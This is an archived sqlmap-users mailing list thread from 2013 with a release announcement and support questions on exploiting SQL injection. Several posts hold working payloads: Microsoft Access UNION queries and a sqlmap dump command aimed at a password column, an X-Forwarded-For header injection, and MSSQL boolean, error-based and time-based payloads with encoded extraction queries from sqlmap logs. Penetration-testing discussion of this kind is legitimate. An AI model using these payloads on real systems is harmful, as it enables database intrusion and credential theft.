sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] Upcoming sqlmap 1.0 stable release

[mitchell <mit...@tu...>]

Thank you, guys, for the invaluable tool!

~~
# m.


On Wed, Mar 20, 2013 at 11:06 PM, André Silva <and...@gm...> wrote:

> Great tool, great developers and i believe i can also say great support.
>
> Thank you guys.
>
> 2013/3/20 Carlos Albuquerque <car...@gm...>
>
>> Thanks for your time, guys! Great work!
>>
>>
>> On Wed, Mar 20, 2013 at 4:29 PM, Brandon Perry <bpe...@gm...
>> > wrote:
>>
>>> Thanks a lot for the hard and great work! You guys rock!
>>>
>>> On Wed, Mar 20, 2013 at 12:12 PM, Bernardo Damele A. G.
>>> <ber...@gm...> wrote:
>>> > Hi fellow sqlmap supporters,
>>> >
>>> > After about two years worth of development since the previous
>>> > (supposedly) stable 0.9 release, a couple of hundreds of bug fixes,
>>> > half a hundred of new features developed, thousands of emails
>>> > exchanged, a few public appearances at nerds' conferences and at
>>> > stylish social gatherings, being called "dumb mother fuckers" by
>>> > someone for "making simple and easy for anyone to hack any one else"
>>> > and, on the other hand, being praised and referenced in a dozen books
>>> > and presentation by others (thanks!)..
>>> >
>>> > ..we have cut the release and are currently wrapping the tool
>>> > (including documentation, yes for real, can't believe either myself)
>>> > for the stable release of version 1.0 in the upcoming quarter!
>>> >
>>> > If you have any further bug to report, now it's the time to speak
>>> out[1].
>>> >
>>> > Thanks for your feedback throughout the journey so far.. expect a few
>>> > news by the time the sun will burn your skin in western summer!
>>> >
>>> > [1] https://github.com/sqlmapproject/sqlmap/issues/new
>>> >
>>> > --
>>> > Bernardo Damele A. G.
>>> >
>>> > E-mail / Jabber: bernardo.damele (at) gmail.com
>>> > Mobile: +447788962949 (UK 07788962949)
>>> >
>>> >
>>> ------------------------------------------------------------------------------
>>> > Everyone hates slow websites. So do we.
>>> > Make your web apps faster with AppDynamics
>>> > Download AppDynamics Lite for free today:
>>> > http://p.sf.net/sfu/appdyn_d2d_mar
>>> > _______________________________________________
>>> > sqlmap-users mailing list
>>> > sql...@li...
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Everyone hates slow websites. So do we.
>>> Make your web apps faster with AppDynamics
>>> Download AppDynamics Lite for free today:
>>> http://p.sf.net/sfu/appdyn_d2d_mar
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Everyone hates slow websites. So do we.
>> Make your web apps faster with AppDynamics
>> Download AppDynamics Lite for free today:
>> http://p.sf.net/sfu/appdyn_d2d_mar
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_mar
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] Upcoming sqlmap 1.0 stable release

[André S. <and...@gm...>]

Great tool, great developers and i believe i can also say great support.

Thank you guys.

2013/3/20 Carlos Albuquerque <car...@gm...>

> Thanks for your time, guys! Great work!
>
>
> On Wed, Mar 20, 2013 at 4:29 PM, Brandon Perry <bpe...@gm...>wrote:
>
>> Thanks a lot for the hard and great work! You guys rock!
>>
>> On Wed, Mar 20, 2013 at 12:12 PM, Bernardo Damele A. G.
>> <ber...@gm...> wrote:
>> > Hi fellow sqlmap supporters,
>> >
>> > After about two years worth of development since the previous
>> > (supposedly) stable 0.9 release, a couple of hundreds of bug fixes,
>> > half a hundred of new features developed, thousands of emails
>> > exchanged, a few public appearances at nerds' conferences and at
>> > stylish social gatherings, being called "dumb mother fuckers" by
>> > someone for "making simple and easy for anyone to hack any one else"
>> > and, on the other hand, being praised and referenced in a dozen books
>> > and presentation by others (thanks!)..
>> >
>> > ..we have cut the release and are currently wrapping the tool
>> > (including documentation, yes for real, can't believe either myself)
>> > for the stable release of version 1.0 in the upcoming quarter!
>> >
>> > If you have any further bug to report, now it's the time to speak
>> out[1].
>> >
>> > Thanks for your feedback throughout the journey so far.. expect a few
>> > news by the time the sun will burn your skin in western summer!
>> >
>> > [1] https://github.com/sqlmapproject/sqlmap/issues/new
>> >
>> > --
>> > Bernardo Damele A. G.
>> >
>> > E-mail / Jabber: bernardo.damele (at) gmail.com
>> > Mobile: +447788962949 (UK 07788962949)
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Everyone hates slow websites. So do we.
>> > Make your web apps faster with AppDynamics
>> > Download AppDynamics Lite for free today:
>> > http://p.sf.net/sfu/appdyn_d2d_mar
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>>
>> ------------------------------------------------------------------------------
>> Everyone hates slow websites. So do we.
>> Make your web apps faster with AppDynamics
>> Download AppDynamics Lite for free today:
>> http://p.sf.net/sfu/appdyn_d2d_mar
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_mar
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] Upcoming sqlmap 1.0 stable release

[Carlos A. <car...@gm...>]

Thanks for your time, guys! Great work!


On Wed, Mar 20, 2013 at 4:29 PM, Brandon Perry <bpe...@gm...>wrote:

> Thanks a lot for the hard and great work! You guys rock!
>
> On Wed, Mar 20, 2013 at 12:12 PM, Bernardo Damele A. G.
> <ber...@gm...> wrote:
> > Hi fellow sqlmap supporters,
> >
> > After about two years worth of development since the previous
> > (supposedly) stable 0.9 release, a couple of hundreds of bug fixes,
> > half a hundred of new features developed, thousands of emails
> > exchanged, a few public appearances at nerds' conferences and at
> > stylish social gatherings, being called "dumb mother fuckers" by
> > someone for "making simple and easy for anyone to hack any one else"
> > and, on the other hand, being praised and referenced in a dozen books
> > and presentation by others (thanks!)..
> >
> > ..we have cut the release and are currently wrapping the tool
> > (including documentation, yes for real, can't believe either myself)
> > for the stable release of version 1.0 in the upcoming quarter!
> >
> > If you have any further bug to report, now it's the time to speak out[1].
> >
> > Thanks for your feedback throughout the journey so far.. expect a few
> > news by the time the sun will burn your skin in western summer!
> >
> > [1] https://github.com/sqlmapproject/sqlmap/issues/new
> >
> > --
> > Bernardo Damele A. G.
> >
> > E-mail / Jabber: bernardo.damele (at) gmail.com
> > Mobile: +447788962949 (UK 07788962949)
> >
> >
> ------------------------------------------------------------------------------
> > Everyone hates slow websites. So do we.
> > Make your web apps faster with AppDynamics
> > Download AppDynamics Lite for free today:
> > http://p.sf.net/sfu/appdyn_d2d_mar
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_mar
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] Upcoming sqlmap 1.0 stable release

[Brandon P. <bpe...@gm...>]

Thanks a lot for the hard and great work! You guys rock!

On Wed, Mar 20, 2013 at 12:12 PM, Bernardo Damele A. G.
<ber...@gm...> wrote:
> Hi fellow sqlmap supporters,
>
> After about two years worth of development since the previous
> (supposedly) stable 0.9 release, a couple of hundreds of bug fixes,
> half a hundred of new features developed, thousands of emails
> exchanged, a few public appearances at nerds' conferences and at
> stylish social gatherings, being called "dumb mother fuckers" by
> someone for "making simple and easy for anyone to hack any one else"
> and, on the other hand, being praised and referenced in a dozen books
> and presentation by others (thanks!)..
>
> ..we have cut the release and are currently wrapping the tool
> (including documentation, yes for real, can't believe either myself)
> for the stable release of version 1.0 in the upcoming quarter!
>
> If you have any further bug to report, now it's the time to speak out[1].
>
> Thanks for your feedback throughout the journey so far.. expect a few
> news by the time the sun will burn your skin in western summer!
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/new
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_mar
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

[sqlmap-users] Upcoming sqlmap 1.0 stable release

[Bernardo D. A. G. <ber...@gm...>]

Hi fellow sqlmap supporters,

After about two years worth of development since the previous
(supposedly) stable 0.9 release, a couple of hundreds of bug fixes,
half a hundred of new features developed, thousands of emails
exchanged, a few public appearances at nerds' conferences and at
stylish social gatherings, being called "dumb mother fuckers" by
someone for "making simple and easy for anyone to hack any one else"
and, on the other hand, being praised and referenced in a dozen books
and presentation by others (thanks!)..

..we have cut the release and are currently wrapping the tool
(including documentation, yes for real, can't believe either myself)
for the stable release of version 1.0 in the upcoming quarter!

If you have any further bug to report, now it's the time to speak out[1].

Thanks for your feedback throughout the journey so far.. expect a few
news by the time the sun will burn your skin in western summer!

[1] https://github.com/sqlmapproject/sqlmap/issues/new

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] MS Access: provide option to specify table name to detect union based sqli vuln

[Bernardo D. A. G. <ber...@gm...>]

Hi buawig,

We have a ticket to address DBMS-specific detection "limitations",
https://github.com/sqlmapproject/sqlmap/issues/1 - Microsoft Access is
indeed one of these cases. We could consider to use the user's
provided database and/or table name when these are needed at detection
phase rather than statically using hard-coded names. There're
trade-offs to this thought.

With regards to the query being overly long, you can use switch
--no-cast to reduce the injected query length.

Bernardo


On 20 March 2013 16:28, buawig <bu...@gm...> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> to simply get the job done I changed the table name in:
> lib/core/dicts.py:144
>
> after changing MSysAccessObjects to foobar sqlmap detected the union
> based sqli but exploitation did not work because it created very long
> queries and the server replied with: "query to complex"
>
> at the end I had to use extract data using boolean based exploitation
> (which did work after finding a column name in the table that had
> unique values)
> -----BEGIN PGP SIGNATURE-----
>
> iQIcBAEBCgAGBQJRSeO+AAoJEJeRHQyF0ukMsrkQALcJwXhjXRRyXzusdloIc9ZZ
> Ybradjx4dKQ00lZR5nkQv+49Xe3V53bwcP4di2KqiiIIo/5gGyoxYzNAREsF2TT3
> FpctmbmE13hnKg16HjZDbpxcJzUN1CMCs3Gb5E0ibP9/RTTHOegOG3xcvceEAj1Y
> DI8YFnDSmQRa2JBenJM8InHve3ue7Ef9seowHm4mBs8bniEskw2sAtxosVZJwUS9
> eRndYwB9jBke9pXx+MuectmajWmMf0cTXhu5q5nOIbbykGZf2DDjduujLMCm6bT4
> +iavnZkW/fHc+cnw1nmiwPcI2vCHxSLZW2ZX5FzpXjM4agXM8+FTQzT8+7WUalfW
> QAAkZYjNWiOgpvFVUBsqgb1ozc/4O33y1oNfbg7SHbopgPOApvtvAxjBa5Igtwh9
> SDTuGXbuovQYoJEOI3JwxTMPXZuUpgvQgszvqfr/JB2MweZk/B9TPPIRLvLwLM3u
> yRRtrrxij296XJ/MZBq5dWcj1Ij3mS1hTeO2GkxNcJnh/vcN4Vsic8OJmQrEGRKP
> Xmz1VT4eqZMh3dzg6d90RQb3oCdVJ0OdY3Duvf7pPMCfKPtk9SROxoqmc+K0bQSl
> CIKgTBcsC3SAmVYZljYk2JqMnorcVvv7bXbvcM2okllA4fmZq+oGf+r2oO80zorQ
> NKORqeE2OQ6bqNYJaDIR
> =VMtR
> -----END PGP SIGNATURE-----
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_mar
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] MS Access: provide option to specify table name to detect union based sqli vuln

[buawig <bu...@gm...>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

to simply get the job done I changed the table name in:
lib/core/dicts.py:144

after changing MSysAccessObjects to foobar sqlmap detected the union
based sqli but exploitation did not work because it created very long
queries and the server replied with: "query to complex"

at the end I had to use extract data using boolean based exploitation
(which did work after finding a column name in the table that had
unique values)
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJRSeO+AAoJEJeRHQyF0ukMsrkQALcJwXhjXRRyXzusdloIc9ZZ
Ybradjx4dKQ00lZR5nkQv+49Xe3V53bwcP4di2KqiiIIo/5gGyoxYzNAREsF2TT3
FpctmbmE13hnKg16HjZDbpxcJzUN1CMCs3Gb5E0ibP9/RTTHOegOG3xcvceEAj1Y
DI8YFnDSmQRa2JBenJM8InHve3ue7Ef9seowHm4mBs8bniEskw2sAtxosVZJwUS9
eRndYwB9jBke9pXx+MuectmajWmMf0cTXhu5q5nOIbbykGZf2DDjduujLMCm6bT4
+iavnZkW/fHc+cnw1nmiwPcI2vCHxSLZW2ZX5FzpXjM4agXM8+FTQzT8+7WUalfW
QAAkZYjNWiOgpvFVUBsqgb1ozc/4O33y1oNfbg7SHbopgPOApvtvAxjBa5Igtwh9
SDTuGXbuovQYoJEOI3JwxTMPXZuUpgvQgszvqfr/JB2MweZk/B9TPPIRLvLwLM3u
yRRtrrxij296XJ/MZBq5dWcj1Ij3mS1hTeO2GkxNcJnh/vcN4Vsic8OJmQrEGRKP
Xmz1VT4eqZMh3dzg6d90RQb3oCdVJ0OdY3Duvf7pPMCfKPtk9SROxoqmc+K0bQSl
CIKgTBcsC3SAmVYZljYk2JqMnorcVvv7bXbvcM2okllA4fmZq+oGf+r2oO80zorQ
NKORqeE2OQ6bqNYJaDIR
=VMtR
-----END PGP SIGNATURE-----

Re: [sqlmap-users] MySQL < 5.0 common table existence check

[Miroslav S. <mir...@gm...>]

Hi.

If there is no information_schema, then table names should be brute forced
(no other way around). You can always update txt/common-tables.txt with
your "guesses".

Kind regards,
Miroslav Stampar

On Wed, Mar 20, 2013 at 2:59 PM, Mardian Gunawan
<gun...@gm...>wrote:

> Hi,
>
> Guys, I stumble on couple MySQL < 5.0, version 4.1 exactly, seems
> bruteforcing using sqlmap standard existence got me no tables, any
> suggestions?
>
>
> Thanks :))
>
> --
> Cheers,
> Gunma
> http://gunma.rootedker.nl
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_mar
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] MySQL < 5.0 common table existence check

[Mardian G. <gun...@gm...>]

Hi,

Guys, I stumble on couple MySQL < 5.0, version 4.1 exactly, seems
bruteforcing using sqlmap standard existence got me no tables, any
suggestions?


Thanks :))

-- 
Cheers,
Gunma
http://gunma.rootedker.nl

[sqlmap-users] MS Access: provide option to specify table name to detect union based sqli vuln

[buawig <bu...@gm...>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi,

I've got a simple union based sqli (resulting webpage shows only one
entry/row).

Valid statements that show the numbers in the resulting html page:

...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar

- - foobar is an existing table (gathered via error messages in html)
- - password is a valid column in the foobar table

The following URL gives you one password:

...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13
from foobar


Now I wanted to hand over to sqlmap to dump all passwords:

sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password
- --dump

which did not work out (0 entries retrieved), but it was confirmed
that the table has several hundred entries.

- - sqlmap was able to detect the number of columns is 13 (correct)
- - sqlmap confirmed a bolean-based blind sqli vulnerability (but no
UNION based sqli)
- - sqlmap was able to confirm the existence of table name (with --tables)
(echo foobar >  txt/common-tables.txt)
- - sqlmap was able to confirm the existence of column name password
(with --colums)

When running something like:
- --technique=U --union-cols=13 --union-char=1

sqlmap requested something *like*:

...id=-123 union all select
1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from
MSysAccessObjects%00

which results in the following error message (shown in the html page):

The Microsoft Jet database engine cannot find the input table or query
'MSysAccessObjects'. Make sure it exists and that its name is spelled
correctly.

So if sqlmap would accept a known tablename on the command line that
it would use to detect/confirm the union based sqli vuln, instead of
using "MSysAccessObjects" this would make sqlmap more useful
(or simply use the table name specified in -T or previously
bruteforced to detect union-based sqli).

thanks!

PS: I did *not* run sqlmap with special --risk/--level because I don't
want to send several unneeded http requests if the vulnerability is
already confirmed (manually). I'm using sqlmap mainly for exploitation
(not so much for detection) and would appreciate if the user could
tell sqlmap how to exploit a certain sqli (something that is already
partially given with --technique, --union-cols, --union-chars).

I did use 1.0-dev-d1ae62b.

ref:
http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJRSL3LAAoJEJeRHQyF0ukMFLsP/3OdDtcE5K+6AttmQhmadyum
0/yDLbtTS06W6iW1iguuvPL/Kva6gURynOrwEh/eD+AOPVVBUD6vjjHx9Z8R4XLO
8OrOWqQ6xe7ppjsU3ThXy550vFD/n62DgNjsM/JkwTFicSki4+JYwbmE9CPjfSfk
mRmLadOP4/iU7m+s3bv6f58jTUO6YdPOqR3yEWuES5k+sL+7QDDPPk8fEqbvKuxw
JK2yYsa5ZmP78GW9s7Gg1BjnMI51G3NbNI0ZdZllFm2APwSw9R+13YzXwtp0V6oJ
L+SDZJ0ZIJLEw133F/eoASVTQMZICz/K494KmXWlv68ac9TLmrvRGcis7o6FdGE1
lUa5LC7ddNE7Z21g83miC4CaG4JUqXxQ2kdW1HW7joLGHl+Gi45gr0A+t6QmRVOl
njOM/2O3wBDfaif68Equ9+Bm1JK5DzVEwu0mMBUrKNEfynR1PvU6/T7R/f1Ogu8p
8H32HtwGQLowwNYbHz3SMk0ecY9lVOAhIAA6afz0YTuyh777cVJCq7YmgTXBUlpQ
zqEO72FGTyObOnbYhGE8dN6TdfsCk0Fdl5VJC3TTHoLRtRuQC7WzxZktwETl6Jxy
dOjG2MpjMdtu3zR07WzuroRdrgFhnonb1Wq7BWDDKgB6kFrH80GMYt0hpNJ9mY0c
0p/jGfV1aHnEBhy3KpXe
=Q1R5
-----END PGP SIGNATURE-----

Re: [sqlmap-users] double quite problem

[Miroslav S. <mir...@gm...>]

Hi.

This is wrong way to do it.

Proper way is to escape double quotes with backslash (\) on Windows OS
(when calling python interpreter).

Example:
python sqlmap.py -u .... --prefix="*\"*" .....

Kind regards,
Miroslav Stampar

On Sun, Mar 10, 2013 at 10:35 AM, lars peters <lar...@ma...> wrote:

> hello problem is solved with more double quotes on cmd two "" = "
>
> but still injection does not work
>
>
>
> ----- Original Message -----
>
> From: Miroslav Stampar
>
> Sent: 03/10/13 07:38 PM
>
> To: lars peters
>
> Subject: Re: double quite problem
>
>
> Hi.
>
> It's not filtered by sqlmap but by OS command prompt. Which OS do you use?
>
> Have you tried to echo that prefix string (e.g. echo "...) to see what's
> happening?
>
> Kind regards,
> Miroslav Stampar
> Dana 10.3.2013. 09:19 "lars peters" <lar...@ma...> je napisao/la:
>>
>> hello
>>
>> i am trying to test a web app with injection in the x-forwarded-for
>> header and sqlmap filters out the injection chars.
>>
>> the injection is 1"' or 1'" and sqlmap changes to 1' or 1"
>>
>> sqlmap.py -u "http://www.testing/vuln/" --prefix=" ' " "
>> --headers="x-forwarded-for: *"  <---is filtered
>>
>> sqlmap.py -u "http://www.testing/vuln/" --prefix=" " "
>> --headers="x-forwarded-for: * " " <---is filtered
>>
>> i put the spaces there to see.
>>
>> is there a fix for this?
>>
>> regards lars
>>
>
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] double quite problem

[Miroslav S. <mir...@gm...>]

Hi.

It's not filtered by sqlmap but by OS command prompt. Which OS do you use?

Have you tried to echo that prefix string (e.g. echo "...) to see what's
happening?

Kind regards,
Miroslav Stampar
Dana 10.3.2013. 09:19 "lars peters" <lar...@ma...> je napisao/la:

> hello
>
> i am trying to test a web app with injection in the x-forwarded-for header
> and sqlmap filters out the injection chars.
>
> the injection is 1"' or 1'" and sqlmap changes to 1' or 1"
>
> sqlmap.py -u "http://www.testing/vuln/" --prefix=" ' " "
> --headers="x-forwarded-for: *"  <---is filtered
>
> sqlmap.py -u "http://www.testing/vuln/" --prefix=" " "
> --headers="x-forwarded-for: * " " <---is filtered
>
> i put the spaces there to see.
>
> is there a fix for this?
>
> regards lars
>

[sqlmap-users] double quite problem

[lars p. <lar...@ma...>]

hello

i am trying to test a web app with injection in the x-forwarded-for header and sqlmap filters out the injection chars.

the injection is 1"' or 1'" and sqlmap changes to 1' or 1"

sqlmap.py -u "http://www.testing/vuln/" --prefix=" ' " " --headers="x-forwarded-for: *" <---is filtered

sqlmap.py -u "http://www.testing/vuln/" --prefix=" " " --headers="x-forwarded-for: * " " <---is filtered

i put the spaces there to see.

is there a fix for this?

regards lars

Re: [sqlmap-users] problems extracting table names

[Brian M. <Br...@EC...>]

Miroslav, this may be the case.  Since this is a common scenario for the 
input field to be limited in number of characters, does Sqlmap have any 
configuration options to overcome this obstacle?  Perhaps using shorter 
queries or out of band output?

> Hi.
>
> Maybe web server has a treshold value for a parameter value length. This looks like such case.
>
> Kind regards,
> Miroslav Stampar

Re: [sqlmap-users] problems extracting table names

[Miroslav S. <mir...@gm...>]

Hi.

You can't expect sqlmap to compress a query if it needs to have database
name, table name and a query statement inside. It's physically impossible.

You are advised to check out manually what's going on.

Kind regards,
Miroslav Stampar

On Tue, Feb 26, 2013 at 4:02 PM, Brian Milliron <Br...@ec...>wrote:

> Miroslav, this may be the case.  Since this is a common scenario for the
> input field to be limited in number of characters, does Sqlmap have any
> configuration options to overcome this obstacle?  Perhaps using shorter
> queries or out of band output?
>
>  Hi.
>>
>> Maybe web server has a treshold value for a parameter value length. This
>> looks like such case.
>>
>> Kind regards,
>> Miroslav Stampar
>>
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Tricky Injection - Mssql 2005 w/ robust Waf

[Matheus V. <mat...@gm...>]

Hello !

I'm testing an ASP application running under Mssql 2005 that is vulnerable
to Microsoft SQL Server/Sybase inline queries but I'm unable to detect the
name of the database and this is preventing me to dump data from it.
I've already got some table names using '--common-tables' but no matter
what tamper/tamper combination I do, I cannot dump.

Can someone share any thoughts?

Thanks a lot !

Matheus.

Here is a sample of an Http Request:
___

sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: xxxx
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: xxxx=(SELECT
CHAR(58)+CHAR(109)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN
(9983=9983) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(100)+CHAR(97)+CHAR(122)+CHAR(58))
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: All
Table: dbo.xxxx
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| user   | non-numeric |
+--------+-------------+

Re: [sqlmap-users] problems extracting table names

[Miroslav S. <mir...@gm...>]

Hi.

Maybe web server has a treshold value for a parameter value length. This
looks like such case.

Kind regards,
Miroslav Stampar
Dana 22.2.2013. 02:23 "Brian Milliron" <Br...@ec...> je
napisao/la:

> SQlmap is able to extract db names, current user and backend info, but
> when I try to get tables I end up with junk data or nothing at all.  I
> find this strange because SQLmap has identified multiple injection
> methods and I am on a fast local connection with the target server.
> This is the log file with examples of good/bad data.
>
> sqlmap identified the following injection points with a total of 118915
> HTTP(s) requests:
> ---
> Place: POST
> Parameter: accountNumber
>      Type: boolean-based blind
>      Title: Generic boolean-based blind - Parameter replace (original
> value)
>      Payload: accountNumber=(SELECT (CASE WHEN (4906=4906) THEN 1111111
> ELSE 1/(SELECT 0)
> END))&meterNumber=1111111&zipCode=78451&email=te...@te...
> &register=Register
>
>      Type: error-based
>      Title: Microsoft SQL Server/Sybase error-based - Parameter replace
>      Payload:
>
> accountNumber=(CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR(100)+CHAR(58)+(SELECT
> (CASE WHEN (3149=3149) THEN CHAR(49) ELSE CHAR(48)
>
> END))+CHAR(58)+CHAR(100)+CHAR(111)+CHAR(103)+CHAR(58))))&meterNumber=1111111&zipCode=78451&email=
> te...@te...&register=Register
>
>      Type: AND/OR time-based blind
>      Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
>      Payload: accountNumber=-9196 OR 8333=(SELECT COUNT(*) FROM sysusers
> AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS
> sys5,sysusers AS sys6,sysusers AS
> sys7)&meterNumber=1111111&zipCode=78451&email=te...@te...
> &register=Register
> ---
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0
> back-end DBMS: Microsoft SQL Server 2008
> available databases [21]:
> [redacted]
> current user:    [redacted]
> current database:    [redacted]
> current user is DBA:    False
>
> [6 tables]
>
> +------------------------------------------------------------------------------------------------------------------------
> | dbo.[??4c0?4A00370?520?22??2d0040005a??00??2A??58??5f0?0d00000?3c??2
> |
> |dbo.[\n\n]
> |
> |dbo.[\n\n]
> |
> dbo.[\n\n]
>
> dbo.[\n\n]
>
> +------------------------------------------------------------------------------------------------------------------------
>
> When I use --no-cast and --hex flags I get no data at all and when I
> don't use them I get junk data.  When I look at the raw request/response
> in every case I see sqlmap send a test request with no injection which
> generates a 200 response, then follows an attempt to read the number of
> tables which generates a 500 error with a number in the error message.
> Every follow on request generates a 200 OK response, which means that
> neither boolean nor error based methods are working and it falls back to
> time based which then also fails.  Of all the correct data gathered so
> far, all was through error messages.  However, specifying --technique=E
> --parse-errors does not gain any additional info.  Some selected
> examples from the logs related to this attempt follow:
>
>
> ./sqlmap.py -r /root/request --fresh-queries -o --hex --no-cast -D
> master --tables -t ~/sqlmap
>
> [WARNING] it was not possible to count the number of entries for the SQL
> query provided. sqlmap will assume that it returns only one entry
> [WARNING] in case of continuous data retrieval problems you are advised
> to try a switch '--no-cast' and/or switch '--hex'
> [CRITICAL] unable to retrieve the tables for any database
> [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 18 times
>
>
> %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master..
> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
>
> HTTP response [#2] (500 Internal Server Error):
> [Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when
> converting the nvarchar value ':omd:0x00000167:dog:' to data type int.
>
>
> %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28master.sys.fn_varbintohexstr%28CAST%28master..
> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %20AS%20VARBINARY%28MAX%29%29%29%29%2C1%2C100%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20AND%20master.sys.fn_varbintohexstr%28CAST%28master..
> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %20AS%20VARBINARY%28MAX%29%29%29%20NOT%20IN%20%28SELECT%20TOP%200%20master.sys.fn_varbintohexstr%28CAST%28master..
